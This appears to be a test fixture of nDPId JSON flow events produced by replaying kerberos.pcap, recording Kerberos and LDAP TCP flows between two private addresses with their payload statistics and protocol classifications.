+00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929981,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930192,"flow_last_seen":1549337930193,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49166,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930214,"flow_last_seen":1549337930214,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49167,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337930217,"flow_last_seen":1549337930217,"flow_idle_time":7560000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49168,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931198,"flow_last_seen":1549337931199,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":113,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49170,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7560000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00710{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":600,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931218,"flow_last_seen":1549337931219,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7560000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937703,"flow_last_seen":1549337937703,"flow_idle_time":7560000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49181,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937724,"flow_last_seen":1549337937724,"flow_idle_time":7560000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49182,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937725,"flow_last_seen":1549337937726,"flow_idle_time":7560000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337940431,"flow_last_seen":1549337940432,"flow_idle_time":7560000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7560000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":477,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00705{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7560000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951709,"flow_last_seen":1549337951710,"flow_idle_time":7560000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952265,"flow_last_seen":1549337952266,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00708{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"","username":""}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952280,"flow_last_seen":1549337952281,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49195,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00704{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": 
{"hostname":"","domain":"","username":""}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952282,"flow_last_seen":1549337952282,"flow_idle_time":7560000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49196,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929983,"flow_last_seen":1549337929983,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49161,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931189,"flow_last_seen":1549337931190,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49169,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
+00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931211,"flow_last_seen":1549337931213,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":452,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937690,"flow_last_seen":1549337937691,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337937700,"flow_last_seen":1549337937701,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":476,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49180,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} 
+00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":524,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"LDAP","breed":"Acceptable","category":"System"}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337952273,"flow_last_seen":1549337952274,"flow_idle_time":7560000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":270,"midstream":1,"thread_ts_msec":1549337952283,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 